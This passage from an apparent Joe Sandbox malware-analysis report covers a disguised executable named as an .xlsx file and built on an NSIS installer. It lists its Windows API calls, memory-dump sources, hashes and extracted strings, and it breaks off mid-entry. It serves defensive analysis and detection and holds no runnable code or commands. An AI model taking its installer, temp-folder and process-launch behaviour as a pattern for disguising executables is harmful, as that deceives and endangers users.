                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3936084776
                                                                            • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                            • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                                            • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                            • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                            • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                            • String ID:
                                                                            • API String ID: 1404258612-0
                                                                            • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                            • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                                            • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                            • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                                            APIs
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                              • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                              • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                                            • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 3585118688-0
                                                                            • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                                            • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                                            • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                                            • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405195
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                                              • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                            • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                                            • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                            • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                            • CloseHandle.KERNEL32(?), ref: 004056F5
                                                                            Strings
                                                                            • Error launching installer, xrefs: 004056D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                            • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                                            • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                            • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
                                                                            • GlobalFree.KERNEL32(?), ref: 004038AB
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3936084776
                                                                            • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                            • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                                            • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                            • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059E5
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059F5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3125694417
                                                                            • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                            • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                                            • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                            • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                            • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                                            • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                                            • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                            • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                                            • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                            • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                                            • GetDlgItem.USER32(?,?), ref: 00404B91
                                                                            • GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                                            • SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
                                                                            • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                                            • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
                                                                            • DeleteObject.GDI32(00000000), ref: 00404C64
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                                            • GetWindowLongW.USER32(?,?), ref: 00404D9F
                                                                            • SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
                                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                                            • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                                            • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                                            • ShowWindow.USER32(00000000), ref: 0040514F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                                            • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                                            • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                                            • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                                            APIs
                                                                            • #17.COMCTL32 ref: 00403379
                                                                            • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                            • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                              • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                                              • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
                                                                              • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                            • SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3
                                                                              • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                            • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                            • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                            • CharNextW.USER32(00000000,00434000,?), ref: 00403403
                                                                            • GetTempPathW.KERNEL32(?,00436800,00000000,?), ref: 0040353B
                                                                            • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                                            • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                                            • GetTempPathW.KERNEL32(?,00436800,00436800,\Temp), ref: 0040356C
                                                                            • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                                            • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                                            • OleUninitialize.OLE32(?), ref: 0040366C
                                                                            • ExitProcess.KERNEL32 ref: 0040368C
                                                                            • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                                            • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                                            • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                                            • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                                            • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                            • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                                            • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                            • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                            • ExitProcess.KERNEL32 ref: 00403827
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                            • API String ID: 4107622049-1875889550
                                                                            • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                                            • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                                            • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                                            • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 004057F9
                                                                            • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405841
                                                                            • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405864
                                                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040586A
                                                                            • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040587A
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                                            • FindClose.KERNEL32(00000000), ref: 00405929
                                                                            Strings
                                                                            Memory Dump Source
